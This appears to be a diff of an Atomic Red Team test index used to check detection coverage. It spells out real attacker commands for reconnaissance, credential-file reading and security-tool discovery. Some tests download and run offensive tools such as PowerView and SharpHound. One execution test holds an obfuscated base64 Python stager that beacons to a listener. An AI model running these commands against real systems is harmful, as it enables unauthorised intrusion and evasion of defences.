[Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * -' + ' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk -' + ' prereq_command: 'WHERE nltest.exe >NUL 2>&1 -' + ' get_prereq_command: 'echo Sorry RSAT must be installed manually -' + ' executor: command: 'nltest /domain_trusts -' + ' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk -' + ' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" -' + ' - description: 'RSAT PowerShell AD admin cmdlets must be installed -' + ' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" -' + ' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" @@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system -' + ' supported_platforms: - macos - linux @@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file -' + ' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 -' + ' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user -' + ' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username -' + ' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely -' + ' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get install login; exit 1; -' + ' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups -' + ' supported_platforms: - linux - macos @@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups -' + ' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery -' + ' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) -' + ' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" -' + ' executor: name: powershell elevation_required: false @@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore -' + ' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'wmic.exe group get name -' + ' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group -' + ' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed -' + ' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python -' + ' supported_platforms: - windows input_arguments: @@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' executor: command: 'python #{filename} -i #{host_ip} -' + ' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery -' + ' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus -' + ' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares -' + ' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} -' + ' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare -' + ' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share -' + ' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain -' + ' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: '"Join system to domain" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 -' + ' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. -' + ' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v7 -' + ' executor: command: 'cat /etc/security/pwquality.conf -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v6 -' + ' executor: command: | cat /etc/pam.d/system-auth @@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. -' + ' supported_platforms: - linux executor: command: 'cat /etc/login.defs -' + ' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts -' + ' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts /domain -' + ' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. -' + ' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist -' + ' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain -' + ' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} -' + ' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 @@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i -' + ' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a -' + ' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' -' + ' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done -' + ' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'adidnsdump must be installed and part of PATH -' + ' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} -' + ' get_prereq_command: 'pip3 install adidnsdump -' + ' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} -' + ' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip neighbour show -' + ' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip route show -' + ' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." -' + ' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' -' + ' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' -' + ' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 -' + ' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion -' + ' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors -' + ' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. -' + ' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info -' + ' supported_platforms: - macos executor: @@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info -' + ' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null -' + ' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. -' + ' supported_platforms: - windows executor: command: 'hostname -' + ' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. -' + ' supported_platforms: - linux - macos executor: command: 'hostname -' + ' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. -' + ' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid -' + ' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 @@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - windows executor: command: 'set -' + ' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - macos - linux executor: command: 'env -' + ' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all -' + ' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist -' + ' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" -' + ' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee @@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection -' + ' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; -' + ' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) -' + ' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. -' + ' supported_platforms: - windows executor: command: 'Get-Date -' + ' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date -' + ' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\" | python &\"" -' + ' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ 